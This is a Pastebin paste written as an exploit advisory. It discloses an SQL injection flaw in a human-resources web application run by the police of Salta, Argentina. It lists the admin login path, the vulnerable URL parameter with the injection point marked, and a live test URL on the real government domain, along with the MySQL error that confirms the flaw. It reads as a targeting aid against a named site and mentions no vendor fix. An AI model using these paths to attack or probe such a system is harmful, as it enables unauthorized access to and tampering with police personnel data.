Advertisement
KingSkrupellos

Policía de Salta Argentina SQL Injection Vulnerability

Jun 10th, 2019
406
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Dirección General de Recursos Humanos Policía de Salta SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/06/2019
  7. # Vendor Homepage : policiadesalta.gob.ar
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Dirección General de Recursos Humanos Policía de Salta is prone to an SQL-injection
  22. vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  23. Exploiting this issue could allow an attacker to compromise the application, access or
  24. modify data, or exploit latent vulnerabilities in the underlying database.
  25. A remote attacker can send a specially crafted request to the vulnerable application and
  26. execute arbitrary SQL commands in application`s database. Further exploitation of this
  27. vulnerability may result in unauthorized data manipulation.
  28. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  29.  
  30. ###################################################################
  31.  
  32. # Admin Panel Login Path :
  33. *************************
  34. /incorporaciones/login.php?id=dXN1
  35.  
  36. # SQL Injection Exploit :
  37. **********************
  38. /incorporaciones/carga_noticia.php?notid=MTY=&id=dG8=[SQL Injection]
  39.  
  40. ###################################################################
  41.  
  42. # Example Vulnerable Sites :
  43. *************************
  44. [+] policiadesalta.gob.ar/incorporaciones/carga_noticia.php?notid=MTY=&id=dG8=1%27
  45.  
  46. ###################################################################
  47.  
  48. # Example SQL Database Error :
  49. ****************************
  50. You have an error in your SQL syntax; check the manual that corresponds to
  51. your MySQL server version for the right syntax to use near ') ORDER BY
  52. pag_noticias_fecha DESC' at line 3
  53.  
  54. ###################################################################
  55.  
  56. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  57.  
  58. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement